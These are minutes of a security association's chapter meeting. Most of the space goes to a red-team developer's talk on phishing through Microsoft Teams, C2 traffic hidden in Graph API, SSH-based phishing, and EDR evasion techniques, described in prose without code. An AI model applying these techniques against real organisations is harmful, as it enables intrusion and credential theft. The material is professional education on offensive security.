ISSA Chapter Meeting 7 May 2024:

Opening remarks: Hybrid meeting: Meeting held in-person at ECPI and virtually on Zoom. For questions, please raise your virtual hand or use the chat feature. Charles is attending virtually today. Please give us feedback after the meeting what did you like? What could we improve?

Agenda: Welcome/Membership/Education/Presentation/Business Meeting/Q&A/ Feedback/Adjourn


Organization Chart:

As usual we are looking for volunteers!

ISSA-HR Professional Association Benefits: Build professional relationships, stay current on developments in areas of information security/risk/privacy, professional development, education opportunities, (looking forward to our presentation today!) Earn CPE/CEU continuing education credits, learn practical and best practice solutions, career information and employment opportunities

Whether you’re a pre-professional, entry-level, mid-career, senior practitioner or security leader, ISSA offers strategic resources and guidance to successive career levels.
Membership Annual Cost: Professional (Not a student) $95, Student 30, (Chapter Dues $30) Professional = $125 total, Student = $60

*Select Hampton roads as your chapter

New Members: Welcome: Steven M!
Patrick is here! He is a new member (March), welcome! Thank you for joining.

Education: Resources on website, we do now have a separate mentorship program; we are passionate about what resources are out there!
Goals: Provide educational resources, mentorship opportunities, teambuilding/collaboration, hands-on industry tool familiarization, certification tracking/pipeline

America’s Cyber Defense Agency: National coordinator for critical infrastructure and resilience
National organization under DHS, Lots of training resources on their website! (screenshot of slide)


Free Courses:
https://www.cisa.gov/resources-tools/trainingResources and Tools: CISA offers an array of free resources and tools, such as technical assistance, exercises, cybersecurity assessments, free training and more!
Also other resources such as toolkits and others! Regional cybersecurity advisor, cyber hygiene, Cyber performance goals, check it out! We as ISSA can also request them to speak.

Social Media Resources:
Zeffy is used for event registrations, we sent an email out if you are signed up for those
with Eventbrite, we were limited a certain number of sign-ups as well as they have begun to charge for the service. Eventbrite is still being used, though it has a 25-attendee limit.


Feel free to pitch in and share ideas on our discord!
Discord (QR below), can use QR code, link or search “ISSA-HR” (https://discord.com/invite/Jt3m7TWQzQ)


LinkedIn: great resource to get in touch with us:
Click the QR code (Above), link or search for “Information Systems Security Association – Hampton Roads Chapter” https://www.linkedin.com/company/information-systems-security-association-issa-hampton-roads-chapter/

Website: Be sure to also check out the Meeting recap on the ISSA-HR webpage!

Been blogging on the LinkedIn! Thanks Faith! We love feedback!
https://issa-hr.org/issa-hr-chapter-meeting-9-april-2024/

Meetings and Social Events:

7 May: Alex Reid, former Navy Red Team (NRT) Tool Developer: An overview of some recent tool developments

4 June: Evan Larson, Millennium Project Manager: Review of recent Facebook/Meta hack: timeline and recommendations.

July, August, September, November: TBD

If you’ve been to, or go to conferences, and find anyone, or if you want to speak yourself! Practice something you’ve been working on or dig into something, such as a class presentation, an experience you’ve encountered or anything else related to cyber!
 
Looking for speakers for 2024 and in-house back-up speaker: please reach out to the ISSA Meeting program Director: Evan Larsen (see email list at bottom)

Cyber Social: Wednesday May 22nd 5:30-8:30, it’s a great casual event, always a good turnout. No expectations, great place to network. Definitely a good time. Be advised we will not get the side room this time, we will be there, come out  for a beer, we might (weather permitting) be able to be outside You can sign up for emails to stay in the know about these events!

After-Meeting Networking Happy Hour: After ISSA meeting at plaza Degollado. (Around at the corner from ECPI).

Jobs: (Have a job/Need a job Next slide):
Need a job: Type of Job, Elevator Pitch (Value you bring, qualifications, additional info)
Have a Job: Title of Job, basic requirements, contact information

ISSA has a job search page http://iz1.me/XJU31zUSeBV  
https://issa-jobs.careerwebsite.com/jobseeker/search/results/

Government Jobs: USAJOBS.gov:
Government job resource: Great resource for fed resumes: federal resume Guidebook by Kathryn Troutman

Best way to get a job is through networking, as always.

Need a Job: If you’re looking for work, now’s your chance to let us know! Let us hear your elevator pitch: an Introduction, summary of what you do: current role and why you are doing well there, relevant experience, explain your value/what problem you can solve, and a Call to action for what you’d want to do next. Whether you are currently employed or just want to practice, now is a great opportunity.

Optionally, for an extra 30 seconds you can add other details such as clearance status, remote, on-site or relocation preference, additional education/certs not already mentioned, and other short details. We can post your email in the chat if you want, we will ensure it gets to the right people.



Have a Job:
Job title/Company/Type (Contractor, Government, Private sector, Internship, Full time, Part time)/Requirements (Years’ work experience, Education, Certs, Clearance)/Desired experience, qualifications and any other information desired (keep it short)


Monthly Presentation: Red Team Tooling



Speaker: Alex Reid: Adept cybersecurity professional transitioning from Navy Red Team to another red team within the DoD. Strong passion for offensive security, skilled penetration tester and internal compromise assessor as well as purple teamer.
He is proficient in exploring Active Directory and holds OSCP and OSEP certifications.
He has also contributed two tools to the Cobalt Strike Community kit!
Alex has keen interest in AV evasion and exploitation techniques to circumvent defenses or mature organizations. Extensive experience in C and C# programming, sandbox evasion, shellcode encryption and innovative API resolution methods. Additionally, he has considerable experience in Python3 for automating enumeration and payload generation.
Alex is actively enhancing Cobalt Strike’s functionality with Aggressor scripts and Beacon Object Files, aiming to deviate from detectable default behaviors.

Welcome Alex!


Alex is separating from the Navy (2 weeks left!) Jon Bos and Alex met at another Hampton Roads organization, Navy red team, they know a lot of the same folks
Worked on NRT, the Navy has several but he works for THE Navy Red team.

Would like to take this time to talk about experience

WHOAMI:

Started as operator (CWT), advanced to tech lead and went from there, was not such a pipeline but a journey,


OSEP certified, OSCP is the benchmark OS cert, OSEP is 300 level (OSCP is 200 level) explored the topic of the Red team toolbelt.
Prior to the Navy had never opened a command prompt. 6 months in (A school) and then to the red team, which was a roll of the dice. There is no formal selection process, you get what you get, Alex acknowledges he got lucky. “There’s cybersecurity, offensive security is all about skillsets, it helps to have backgrounds, software engineering, support, admin..” (Alex did not get that)

“Lost a lot of hours, and late nights to gain the knowledge he needed to succeed in his rate.”
Walked a sort of gray line during time in the Navy, (There was NO policy so it’s possible he got away with a lot) Kind of operated under mental best practices, asking questions such as ‘What is too dangerous to release? What could be used against the Navy?’


What’s In Red Team Operation?:


“Broad overview, focus on stealth and adversary emulation in pentesting. Comprehensive review of network, listing and categorizing by severity. (Vulnerabilities). Red teaming is less about finding every hole and more about using the ones you find to your advantage. Beyond domain admin privileges, more of what you do after that. Or even if you have to do anything after that.

“During workups, things are tested, including penetration tests. Such as degrading network, phishing simulations from APTs, trying to make sure those who may be involved are truly ready. From the government side, communicating to senior officers WHY they should care, and how it translates to “warheads on foreheads” is a great challenge.
Red team ops have multiple phases, recon, initial access and post exploitation, persistence, lateral movement, cred harvesting etc.
Malware used to implant, harvesting O65 creds, “trusted” emails.
Each of these phases have multiple subphases.
Tools make the world go ‘round!

There are a hundred ways to set persistence or laterally move, most affect the network at a low level, if you have tools, you can achieve these tasks reliably and quickly.
each stage has different tools, NMAP for enumeration, all the way to post-exploitation tools to build and implant a bypass for access control, dump credentials from LSAS or SAM processes, all part of the main goal.

Red Team Landscape:


“Things have gotten progressively harder in the Red Team world since I have noticed two years ago, (that’s a good thing!), greater adoption of two-factor (2FA) authentication and endpoint detection and endpoint response (EDR, “new age antivirus”) a million different types of them, Sentinel One, Carbon Black, Microsoft, each one works differently, think of it as a giant cat-and-mouse game. It’s these advancements that make it harder for an adversary to do things, this is what makes Red Teaming harder.

“The shelf life of public tools has shrunk, by the time it gets from GitHub to EDR or patched by vendor: post exploitation tool that works on Windows that Microsoft “cant” fix, no bug or fix but a feature. They cannot patch that but EDR vendors can write signatures to help people know more about it and respond accordingly.

Q: Jon: as this time frame shrinks, what is the new incentive for folks to release on GitHub?
A: Alex: Jobs. In combination of getting certs. It helped that I was interested in the work. From an economic perspective it makes sense to do it. When it’s exposed, the clock starts on that shelf life. Not to say that once it’s out there– it depends how impactful the tool is, the more popular, the faster they are likely to get patched. The latter are still viable years later.
Most have found they may be discouraged to post tools on GitHub or even blog posts for these reasons.
Q: Kenn: lot of money in the grey market?
A: Alex: and potential legal consequences.

Kenn: Would people pay $50/$100 for access to these tools?
Alex: Different countries may classify these tools as export controls or cyber weapons that may “muddy” the waters.

Kenn: say a government likes your tool, what’s stopping them from turning around and selling it to the enemy?


(Above) Chart shows median dwell time, going back to 2011, the median dwell time was 416 days (that much time the TA was on the network)

Fast forward to 2015, the data breaks off from external/internal. Microsoft may have seen tenant logs, (external) SOC, BT detects behavior themselves (Internal). In 2023 the difference is STARK even in the last 4 years, median has gone down from 24 days to 10.

“Offensive security is getting harder. Each day the low hanging fruit is plucked, people have to get more creative, people are getting more security aware, tying cyber into executive goals.
The natures of these attacks over the years have changed to affect these numbers, such as ransomware attacks. Once they have what they need, they’ll let themselves be known but they may be sneaky until then to get as much information as they can.


Red Team Tool Design Theory:

“Tools should be user friendly. A lot of tools have setup steps, dependencies, python packages, compiling, build processes, and then there’s actually running the tool.
A lot of tools have a lot of parameters, depending on what you want them to do, to include “guardrails”. Despite developers’ intent, people find ways to use programs as they are not intended. Safeguards must be considered, such as input validation, regex, etc.

“Blend in with legitimate program behavior/system calls/network traffic, as much as possible.
Trying to be sneaky, to get past EDRs, to which EDR creators respond promptly to, and helping establish patterns and labeling them as malware. Red team tools have adapted to techniques such as Living off the Land in response, using native programs to their advantage.

Patrick: D/invoke has developed to detect odd API calls.
Alex: D/invoke helps identify APIs that assist in malware behavior (API Hooking), in memory, DLLs contain APIs and functions. Each of these export functions used by programs. EDRs load their own DLLs into whatever process, and overwrite (in memory) the instructions presently in that function DLL. When you call that API, the new DLL gets sent to EDR, EDR determines whether it’s legitimate. EDR patches if something devious is detected and the program can continue to work as normal (hells gate, halos gate, directing syscalls to get around EDRs and their telemetry).


“Microsoft is integrated at the kernel level. Red teamers try to spoof parent processes. It’s possible through API call manipulation that can change or obscure parent processes to be something unassuming. Malicious .exe’s can look like legitimate processes. Parent process spoofing can be detected by modern EDRs. Determining normal behavior, finding patterns, are what red teamers look for, so the logs can stick out less. Avoiding static indicators (drop file to click), a normal operation; the name of the file can be arbitrary. The idea is between runs of those tools, to change not the code, but build functionality to maybe make a random file name to help deter from pattern detection.

“If targeting a Windows environment would use Python since it’s native, would want to be written in a language appropriate for where they are meant to run interoperably with tools when possible, and ensure FUNCTIONALITY! Though many lessons are learned when something breaks.

“Lastly, have accurate documentation for not only those using the tool, but yourself.
You will save HOURS. Viewing old code through older eyes can show a lot of past (purposeful) seemingly bad code, which has a purpose! But you forgot. And now the code won’t run.


Tool Showcase:

Teamsphisher: Python tools that automates sending of phishing messages and file attachments to Microsoft teams users. Teams cannot send content outside of their tenant organization, this is a client-side feature, if you invoke server side, you can bypass those controls.
Alex did NO research, used public research and pieced it together for this tool. Jumpsec had published some pertinent documentation in the development of this tool. The victim does not get an “outside organization” warning, can send arbitrary files or malicious executables.

TeamPhisher usage: options switches, targets (email addresses in the Microsoft ecosystem), the phishing message, attachment,
Normal splash screen:
 (see photos)



can use pretexting and social engineering with this technique.

TeamsPhisher has a splash screen bypass, you still get the outside organization banner but ‘people don’t read’:


They get message, text file, and whatever else you sent them.

TeamsPhisher timeline:




“An article was published by bleepingcomputer that sourced from Alex’s GitHub which just says “Navy red Team member”; was asked if I was a member of every branch (except coast guard).
Teamsphisher was a side project. Not done on Navy Time, Navy is NOT vulnerable to this program. It was checked.

TeamsPhisher, Lessons Learned:

“Impact > geek factor. Nothing fancy; a side project not to be used operationally, and is now by far the most visible tool that put Alex on the map, despite his more complex and (to him) cooler tools. The best product may not win. Microsoft’s initial nonchalant response is concerning. (Maybe there were bigger fish to fry?)


On open source tooling: if it does manage it may not sound ethical.
How so we mitigate?: Release the research as opposed to the fully functional tool code. Or, if you are to post code samples, build IOC’s into the tool. If the code base is out there, Threat Actors will find it, but to a script kiddie it may be more obscured –ripping off/using stock from the internet, might not parse the code  themselves and create “tracks”.

Tool Showcase: GraphStrike:


“A toolkit so CS beacons via Microsoft Graph API instead of normal c2 traffic methods. Traffic  can be made to look similar to legitimate sources.

Diagram (see slide): normal operation: buy domain, redirect, beacon sends HTTPS GET requests to look like normal website, but requests contains command from teams server, from targets perspective, this process is legitimate.
GraphStrike: obscures to have headers and URIs look legitimate.
Sending all beacon traffic to Microsoft servers, using legitimate service (GraphAPI), to include jitter.

GraphStrike: why?:

 “Microsoft’s Graph API is seen being used in malware developed by APTs., various malware families. This is a real-world threat. This tool provides a way for red teams to simulate that very real threat.

NO advanced direct coordination with Microsoft, we are not trying to hide from Microsoft, we are trying to hide from our victim. Better to ask forgiveness than permission. That’s the current medium ground where Alex is currently.

Tool Showcase: SSHishing:

“Most recent work, name plays off what you see on LinkedIn, twitter “vishing, smishing,” etc. Developed a phishing toolkit that creates a port forward using SSH between Alex and his victim.
“Windows 10 by default ships with SSH client installed, SSH server has to be enabled but client is there. LOLBAS (living off the land (https://lolbas-project.github.io/ ), people have aggregated Microsoft signed, Windows default applications to use as offensive –LOLBAS displays binaries native to windows that could be used offensively.
Options and switches native to SSH help to create a more convincing phishing experience. Once payload is ran, (i.e shortcut) it can call SSH, with specified switches. Downloads, executes, calls SSH locally, as well as opens a real file, to further obscure anything ‘phishy’.
can run commands like ipconfig to aid in situational awareness, or try to use SSH key hosted on attacker’s server to capture network credentials.
ALL within SSH.

SSHishing illustrated:



“Reverse shells are useful since outbound firewalls are generally much more permissive than inbound ones.
port 22 going out of the network looks less ‘phishy’ than port 445 (EternalBlue)
Proxychains allow to access ports via SSH into private networks, while response traffic goes back through the tunnel to attacker machine. As a result, ssh.exe is able to spawn and run cmd.exe commands even when disabled by Group Policy.

SSHishing- DEMO: (This slide shows a realtime SShishing demonstration), and can be elaborated on further from this Red Siege blog post written by Alex: https://redsiege.com/blog/2024/04/sshishing-abusing-shortcut-files-and-the-windows-ssh-client-for-initial-access/

Kenn: webproxy helps ask for creds for SSH outbound

Q&A:
Q: You can use tools all you want in HTB, what about real world?

A: if you’re looking to get into malware, malware academy is great, came out about a year ago, (Speaker) has not bought it yet $500 for lifetime access, full useable code samples, malware evasion type stuff, actively maintained and updated. I have learned great lessons from dropping Mimikatz to squat. Lol
There are some courses out there more RT methodology/mindset, (CRTO/CRTO2,  get CobaltStrike in the course, teach you trade craft/methodology for CS. There is not really a crash course to red teaming. Tool devs and operators aren’t the same but they work together.
(Contact)


Thank you Alex!



Business Meeting:

Old business/New business/Membership Updates/Secretary: Meeting Minutes/Treasury Report/Social Media Updates

Old Business: Social Event, Casual Pint April 24th, Mentorship program, Mentorship Chair: Desmond Graham

New Business:
Conferences
Volunteer Events: Volunteer Events: What would members like to participate in? Who can volunteer to lead?

ISSA Mentorship program:
Desmond Graham: Mentorship Chair
Call for volunteers on the mentorship Program committee

Call for Mentors: reaching out to schools and companies in the area
Mentorship Mixers: Learn about how to get into cybersecurity with no previous background
Meet and learn from cybersecurity SME mentors
Network with hiring managers and the cybersecurity ecosystem

Conferences:

5th Annual Digital Forensics for National Security: May 15-16 in National Harbor, MD: $0-$1290 https://digitalforensics.dsigroup.org/

Women Tech Leaders Summit: May 15-16 in Washington DC: $20-$299
https://govciomedia.com/women-tech-leaders-summit/

Women in Tech DC: May 15-16 in Washington DC: $249-$549
https://www.women-in-tech-dc.com/buy-tickets

HammerCon 2024: May 16th in Laurel MD: $0-$50, https://www.eventbrite.com/e/hammercon-2024-3rd-annual-national-convention-of-the-mcpa-registration-787154780137

Gartner Security & Risk Management Summit: June 3rd-5th in National Harbor MD: starts at $3825-, https://www.gartner.com/en/conferences/na/security-risk-management-us

RVASEC: June 4th-6th in Richmond VA: $375-, https://rvasec.com/


TECH YEAH 3.0: June 19th-20th in Morgantown WV: $0-(DoD $199), https://www.techyeahconference.com/techyeah3

TECHSPO 2024: July 1st-2nd in Washington D.C.: $0-, https://techspowashingtondc.com/register/

BSides Roanoke 2024: July 12th in Roanoke VA: Pricing unav. At time of writing, used to be free. If you want to guarantee getting in for free and even meeting speakers the night before at the meet and greet, or after tickets are no longer available, volunteer! https://bsidesroa.org/Jon B: If you watch the calendar, you have a chance of getting in!

Zero Trust Government Symposium: July 17-18 in National Harbor, MD: $0-$1290
https://zerotrust.dsigroup.org/

DC Metro Cybersecurity Summit: July 18th in McLean VA: $195-$250, https://cybersecuritysummit.com/summit/dcmetro24/

DISA J6 Cyber Awareness Forum 2024: July 25th in Alexandria VA: $Free, but DoD only. https://www.fbcinc.com/event.aspx/Q6UJ9A01YF2W

Black Hat USA 2024: August 3rd-8th in Las Vegas, NV: $1,895 (JUST FOR BRIEFINGS -,price goes up from there, Training (6 days~, very good training, VERY expensive) https://www.blackhat.com/us-24/DEF CON 32: August 8th-11th in Las Vegas, NV: $300(limited to badge holders) https://forum.defcon.org/node/248358

FutureCon: August 22-24 in Washington DC: $50-$200
https://futureconevents.com/events/washington-dc-2024/

Mike: DON IT East: https://www.doncio.navy.mil/ContentView.aspx?id=16674

Mike: Techno Wilmington in early June (4-6) : https://www.technosecurity.us/east

Membership Update:
Number of members: 45
Last meeting: 9 members, 6 visitors in attendance

April 9th Meeting Minutes: Meeting recap on website:
https://issa-hr.org/issa-hr-chapter-meeting-9-april-2024/

Presentation Speaker: Len Gonzales: Real-World OSINT Operations  
Business Meeting:
Old Business: Cyber Social @ Casual Pint, Mentorship Program
New Business: Mentorship Program outreach, POC Desmond Graham
$4,346.65 recorded.

Treasurer Report:
Balance: $4,441.71
We NEED to get to $5k

2024 Events Calendar:

Social Media:

Email Addresses:


After Meeting: Networking Happy Hour @ Plaza Dellogado

Please give us feedback!: What did you like? Recommendations for future meetings? What could make your experience better?
Send your feedback to President @ ISSA-HR. org


Opening remarks: Hybrid meeting: Meeting held in-person at ECPI and virtually on Zoom. For questions, please raise 

Minutes notes proudly human-generated By Faith Walauskas, Secretary: ISSA Hampton Roads.
Thank you for reading!

Written by